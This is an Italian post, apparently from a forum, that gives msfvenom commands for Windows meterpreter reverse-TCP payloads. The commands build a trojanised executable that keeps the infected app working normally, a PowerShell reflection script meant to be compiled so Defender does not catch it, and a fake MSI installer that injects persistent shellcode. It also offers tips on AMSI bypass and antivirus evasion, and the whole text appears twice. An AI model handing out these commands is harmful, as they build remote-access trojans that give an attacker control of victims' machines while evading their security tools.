La fregarella
il mio preferito *red teaming intensifies*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -x <app da infettare> -k <mantieni il comportamento dell'app inalterato> -f exe -o trojan.exe
The Powershell purge. Compila il risultato con PS2EXE per generare un artefatto che giace indisturbato sotto i riflettori del signor Defender (almeno finché non ci clicchi). Per bypassare Microsoft AMSI.dll però, è richiesta un'azione ausiliare del pentester, o appena ci clicchi sopra Defender ti piomba addosso con una potenza inimmaginabile. Ci sono alcuni metodi open-source per bypassare AMSI per fortuna
divertiti.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -o trojan.ps1 -f psh-reflection (powershell reflection)
Installer contraffatto (MSI) questo ha la specialità di creare un installer finto che crasha da solo (non prima di aver iniettato shellcode persistente in memory)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f msi -o fakeinstall.msi
Inoltre, sempre per chi è alle prese da poco, vi esorto a smettere di criptare insistentemente i vostri payload con gli encoders. Gli encoders si rivelano più utili a criptare lo stager nella fase del post-exploitation (sempre che vogliate usare uno stager). Vi assicuro che ogni AV non programmato da idioti, o da aziende che hanno preso accordi sottobanco con Rapid7, è in grado di fare reverse engineering ai payload generati da msfvenom, anche con 50 iterazioni di multipli encoders
il mio preferito *red teaming intensifies*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -x <app da infettare> -k <mantieni il comportamento dell'app inalterato> -f exe -o trojan.exe
The Powershell purge. Compila il risultato con PS2EXE per generare un artefatto che giace indisturbato sotto i riflettori del signor Defender (almeno finché non ci clicchi). Per bypassare Microsoft AMSI.dll però, è richiesta un'azione ausiliare del pentester, o appena ci clicchi sopra Defender ti piomba addosso con una potenza inimmaginabile. Ci sono alcuni metodi open-source per bypassare AMSI per fortuna

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -o trojan.ps1 -f psh-reflection (powershell reflection)
Installer contraffatto (MSI) questo ha la specialità di creare un installer finto che crasha da solo (non prima di aver iniettato shellcode persistente in memory)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> LPORT=<your port> -f msi -o fakeinstall.msi
Inoltre, sempre per chi è alle prese da poco, vi esorto a smettere di criptare insistentemente i vostri payload con gli encoders. Gli encoders si rivelano più utili a criptare lo stager nella fase del post-exploitation (sempre che vogliate usare uno stager). Vi assicuro che ogni AV non programmato da idioti, o da aziende che hanno preso accordi sottobanco con Rapid7, è in grado di fare reverse engineering ai payload generati da msfvenom, anche con 50 iterazioni di multipli encoders
